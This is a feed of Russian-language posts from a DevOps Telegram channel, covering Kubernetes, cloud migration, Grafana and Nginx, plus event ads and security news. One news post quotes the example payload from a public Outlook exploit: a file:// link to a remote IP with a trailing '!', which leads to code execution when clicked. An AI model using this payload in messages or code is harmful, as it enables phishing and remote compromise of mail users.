KazDevOps – Telegram
KazDevOps
5.38K subscribers
1.3K photos
27 videos
19 files
1.3K links
Канал о DevOps во всех проявлениях: K8s, CI/CD, AppSec, AI/ML, Cloud, Linux
Поможем с DevOps: https://core247.kz/
По рекламе @UlKonovalova
Download Telegram
🔥 Присоединяйтесь к онлайн-вебинару на тему Golang: Механизмы синхронизации и микросервисная архитектура

Спикер вебинара — опытный Golang-разработчик Алексей.

🙋🏼‍♂️Алексей не просто пишет код, а создаёт настоящие произведения искусства. У него за плечами множество проектов, включая микросервисные решения, цифровой тенге и блокчейн.

В программе вебинара:

🔸 Введение в многопоточность Golang
🔹 Механизмы синхронизации го-рутин на практике
🔸 Работа с микросервисами
🔹 Возможность задать вопросы опытному разработчику

👉 Подключайтесь в пятницу, 23 февраля, в 19:00 по Астане
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥62
☄️ Полная версия Kubernetes CKS доступна на YouTube.

Есть и теория, и практика, но экзамен придется сдавать отдельно.

Также для тех, кто не выиграл в прошлом конкурсе, могут пригодятся скидочки 50% от Linux Foundation.

👉 Забирайте здесь и делитесь с коллегами

#kubernetes #cks #k8s #devops

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥6👾4🤡2
This media is not supported in your browser
VIEW IN TELEGRAM
Понедельник начинается не с кофе 🤣

А если серьезно — многие считают, что Kubernetes сложен из-за экосистемы интегрируемых инструментов, но на деле — благодаря этому он и полезен.

Поделитесь в комментах, какую интеграцию в Kubernetes вы считаете самой эффективной 👇🏼

@DevOpsKaz
👍9🤣74🔥2👾2
🔥 VMware просит администраторов как можно скорее удалить EAP

Компания VMware призвала администраторов удалить устаревший аутентификационный плагин VMware Enhanced Authentication Plug-in (EAP). Он подвержен атакам типа authentication relay, а также перехвату сессий из-за двух неисправленных уязвимостей.

«Злоумышленник может вынудить пользователя домена с установленным в браузере EAP запрашивать и передавать сервисные билеты для произвольных Active Directory Service Principal Names (SPN). Также атакующий с непривилегированным локальным доступом может перехватить привилегированный сеанс EAP».


Чтобы удалить или отключить EAP, нужно выполнить ряд PowerShell-команд — вот инструкция.

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍92🔥2👾2
☄️ Postgres Playground — игровая площадка для обучения PostgreSQL. Руководства сфокусированы на практике и примерах, а не на академических определениях.

Они упрощают задачу, шаг за шагом помогая выполнить упражнения, предоставляя наборы данных, примеры команд и терминал, где можно проверить результат.

Пользуйтесь и делитесь с коллегами 🤝

#devops #postgresql #sql #database #db

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21👍733👾2
☄️ Стратегии Cloud Migration

1️⃣Rehosting
Многие новые проекты стараются с самого начала использовать облачные технологии, но когда бизнес требует быстрой миграции большого количества приложений, организации предпочитают переносить их как есть. Например, компания GE Oil & Gas, выявила, что даже без внедрения каких-либо облачных оптимизаций она может сэкономить около 30% своих затрат за счет рехостинга.

2️⃣ Replatforming
Вы можете сделать несколько облачных оптимизаций, чтобы получить выгоду, но в остальном вы не меняете основную архитектуру приложения. Например, вы хотите сократить количество времени, которое тратите на управление экземплярами баз данных.

🔤 Repurchasing
Чаще всего мы видим (repurchasing) как переход на SaaS платформу. Переход CRM на Salesforce.com, HR-системы на Workday, CMS на Drupal и так далее.

4️⃣ Refactoring / Re-architecting
Переосмысление архитектуры и разработки приложения, как правило, с использованием нативных облачных (cloud-native) функций. Вызвано потребностью бизнеса в добавлении новых функций, масштабировании или увеличении производительности.

5️⃣ Retire
До 20% корпоративного портфеля приложений больше не используются и их можно просто отключить. Такая экономия может повысить эффективность бизнеса, направив высвободившиеся бюджет другим командам.

6️⃣ Retain
Обычно это означает «пересмотреть» или ничего не делать (пока что). Вы должны переносить только то, что имеет смысл для бизнеса.

🚩 Компания Core 24/7 может помочь с миграцией в облако или оценить, что она вам не нужна — мы подберем решение, которое поможет бизнесу, и перевезем инфраструктуру максимально эффективно.

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥52👾2
☄️ Отчет о затратах на Kubernetes за 2023 год

Узнайте о тенденциях оптимизации затрат Kubernetes, устраните разрыв между выделением ресурсов и фактическим использованием ЦП/памяти в 4 000 кластерах и получите практические советы, как избежать излишних затрат.

👉 Отчёт основан на анализе 4 000 кластеров, работающих на AWS, Azure и GCP с 1 января по 31 декабря 2023 года до их оптимизации.

#devops #aws #k8s #kubernetes #azure #gcp

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍74🔥3
Forwarded from Делаем IT
Большая онлайн-встреча с лидерами веб и мобильного рынка пройдет уже сегодня🔖

Обсудим, с какими проблемами мы столкнулись в 2023 году и какие строим планы по развитию на 2024 год.

Подключайтесь в 18:00 по ссылке 🔗

Участники:
— Иван Клюкин СЕО из Synaptik
— Анатолий Дубенчак СЕО из Пиксель Плюс
— CEО Дима Юрин, Делаем IT
— СЕО Александр Комбаров из Пиробайта
— Вячеслав Кислицын СЕО из Reactive
— Дима Балыкин Сo-founder из Сedro

Приглашенный эксперт: Петр Федюшкин — Директор Partners’ Club by AGIMA
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥322
Публичный эксплойт на критическую уязвимость Microsoft Outlook

Буквально сегодня в публичном доступе появился эксплойт в виде Poc (Proof of concept) для всех современных версий Outlook. Эксплойт позволяет выполнить удаленный код с правами приложения в обход всех проверок Майкрософт!

Оказалось, для обхода всех проверок и механизмов защиты достаточно в конец расширения документа добавить восклицательный знак. Пример исследователей Check Point: *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*

От жертвы необходимо лишь нажать на ссылку в письме и код будет выполнен. Очевидно, что уязвимость будет максимально широко использоваться в фишинге.

Для защиты рекомендуется как можно быстрее установить обновление приложения.
Подробное описание уязвимости тут.
Оригинальное исследование тут.
🔥9👍63
☄️ Список ресурсов по безопасности CI/CD

👉 Что есть в репозитории:

Риски CI/CD, ошибки конфигурации, статьи про их эксплуатацию и т.д.
Безопасность GitLab CI, Jenkins, GitHub Actions
ArgoCD и настройки в защищенном исполнении
Наборы видеоматериалов
Репозитории с полезными материалами и playground
Примеры реализованных атак на CI/CD

#cicd #devops #gitlab #jenkins

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥54👍43👾2
Фреймворк для создания сетевых сервисов

Платформа Pingora — среда Rust для создания программируемых сетевых сервисов. Открытый исходный код, безопасность, асинхронность и многопоточность.

Помогает создавать сервисы поверх HTTP/1 и HTTP/2, TLS или TCP/UDP. В качестве прокси-сервера он поддерживает сквозное проксирование. Поддерживает как широко используемые библиотеки OpenSSL, так и BoringSSL, которые соответствуют требованиям FIPS и пост-квантовому шифрованию.

#devops #rust

@DevOpsKaz
👍43🔥2🤡2👾2
🛡 Защита API — узнайте, как повысить безопасность с помощью подробного руководства

👉 В статье вы узнаете про:

Целенаправленное использование JWT
Механизмы безопасного хранения
Заявление об использовании токена
Управление временными метками
Безопасное использование алгоритмов при разработке API
Подписание и проверка
Безопасное управление ключами
Использование хранилищ ключей

Пользуйтесь и делитесь с коллегами 🤝

#devsecops #devops #api #apisecurity

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥322👾2
🔥 Как устроен тренажер подготовки к экзамену CKS и CKA(D)

В феврале мы писали про платформу обучения SRE, которая поможет подготовиться к экзаменам CKA, CKS и CKAD. Вам зашло!

👉 Сегодня делимся видеоподкастом, где люди, причастные к платформе, обсуждают, как и чем она живет и много всего интересного:

Стоит ли брать курс от Linux Foundation для подготовки к CKS
Как проходит сам экзамен CKS
Что из себя представляет платформа
Откуда берутся сценарии для заданий
Как проходит проверка заданий
Важное обновление экзаменов Kubernetes
Сколько стоит запустить МОК-экзамен

👉 Ссылка на платформу

#devops #cka #cks #ckad #kubernetes #aws #eks

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥422👾2
☁️ VK Cloud Meetup: Облачные технологии

Это возможность узнать о современных облачных технологиях, архитектурных решениях и Cloud-Native подходах. Спикеры поделятся трендами, кейсами и методами эффективного внедрения инструментов, оптимизации процессов и работы в команде.

🎙 Арман Нургалиев Cloud Architect в Core24/7, автор статей канала KazDevOps. Мигрировал и внедрял более 40 проектов в публичных облаках при помощи terraform.

🎙 Александр Волынский — технический менеджер продукта VK Cloud. Более 15 лет опыта создания и внедрения решений для обработки данных на базе облачных сервисов. Эксперт в области Data Science и Data Engineering.

🎙 Сергей Смирнов — CPO облачной платформы bult.pro, TSARKA. Имеет 10-летний опыт в разработке приложений и высоконагруженных систем, работал в инфраструктурных командах Яндекса.

🚀 Приглашаем всех заинтересованных присоединиться к обсуждению и обмену опытом!

Формат митапа — оффлайн, но также будет онлайн-трансляция.

🗓 Дата: 14 марта (четверг) 2024
🕰 Начало: 17:00
📍 Место: Most IT Hub, Ходжанова, 2/2

👉 Регистрируйтесь здесь

Ждем вас на митапе!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍54🔥42
🔥 Релиз Grafana 10.4

Улучшили Grafana Alerting, обновили визуализацию, внедрили новый плагин и многое другое.

Например, теперь есть инструмент предварительного просмотра миграции оповещений в Grafana Alerting — можно просматривать, редактировать и удалять перенесенные правила перед переключением. Также упростили маршрутизацию уведомлений.

Новый плагин позволяет пользователям напрямую запрашивать и визуализировать данные из SurrealDB в Grafana.

👉 Посмотрите весь список обновлений

🚩 Еще разработчики сообщили о прекращении поддержки AngularJS в Grafana — и рассказали как подготовиттся.

А для тех, кто еще не пользовался Grafana, предлагаем глянуть мастер-класс Grafana as code — может, захотите попробовать 😜

#devops #grafana

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥522👍2👾2
Servercore открывает новую зону доступности в Ташкенте

Servercore — провайдер IT-инфраструктуры с зонами доступности в Ташкенте и Алматы. Среди клиентов — Uzum Nasiya, Alif, Samarkand Air и HWG Sababa.

Клиентам провайдера стала доступна новая зона доступности в Ташкенте. Размещение в двух объединенных общей сетью пулах позволит:
— увеличить отказоустойчивость IT-систем и сервисов,
— повысить уровень безопасности хранения данных,
— снизить задержку при обслуживании конечных пользователей.

В новой зоне доступности для клиентов Servercore стали доступны:
— облачные серверы в пуле UZ-2 на базе AMD EPYC 7713 Milan,
— выделенные серверы в TAS-2 на базе процессоров Intel Xeon E-2236, Intel Xeon W-2255 и Intel Xeon Silver 4214R.

Безопасность и надежность новой зоны доступности подтверждена международным стандартом по информационной безопасности ISO 27001. Все сервисы Servercore соответствуют международному стандарту безопасности данных PCI DSS.

Переходите на сайт, чтобы узнать больше
👍8🔥5👾3🤣2
❤️ Поздравляем наших прекрасных женщин с праздником 8 марта — у нас их целых 15%. Пусть любовь и добро сопровождают вас всегда!

И вы своих поздравить не забудьте! А то знаем мы вас — от компа не оторвать 😁😜
19👾32
🔥 Microsoft: бесплатные ваучеры на экзамены

👉 Регистрируйтесь, выполняйте задание и забирайте ваучер на один из экзаменов:

· AI-900 Azure AI Fundamentals
· AI-102 Azure AI Engineer
· DP-100 Azure Data Scientist
· DP-600 Fabrics Analytics Engineer

Cloud Skills Challenge позволит получить 1 ваучер на экзамен. Каждое задание привязано к соответствующему экзамену.

👉 Вот официальные правила

🚩 Челлендж продлится с 19 марта по 19 апреля 2024 г.

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍64👾2
☄️ Онлайн-вебинар «Как стартап Jasaim внедряет NFT-дипломы в вузах РК, Дубай и США» — сегодня, 9 марта в 17:00 по времени Астаны

🙋🏻‍♂️🙋🏽‍♂️ На вебинаре будут CEO стартапа Jasaim, Сырым Сериков и методолог Devpractice (учебно-методический центр на базе компании qazdev) Фёдор Чангариди.

🔍 Что вас ждёт:

🔹 Узнаете, как технология NFT меняет ландшафт образования и создаёт уникальные возможности для студентов и университетов.

🔸 Опыт эксперта: Сырым Сериков — CEO Jasaim и выпускник престижных программ K-Pro 7, Nuris Quickstart и Draper University.

🔹 Интересные кейсы применения NFT-дипломов в образовательной сфере и как они могут быть внедрены в вашем университете.

👉 Присоединяйтесь по ссылке
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍53🔥2
KazDevOps pinned a photo
☄️ Как хранить и обновлять информацию об SSL-сертификате без перезапуска Nginx

Задаем зону в памяти
Указываем динамические значения сертификата и ключа в этой зоне
Задаем отдельный location для очистки кэша зоны
Получаем возможность динамически подгружать в конфигурацию Nginx сертификаты после их обновления.

👉 Узнать подробнее
👉 Пример конфига
👉 Готовое решение

#devops #nginx #acme #ssl

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥641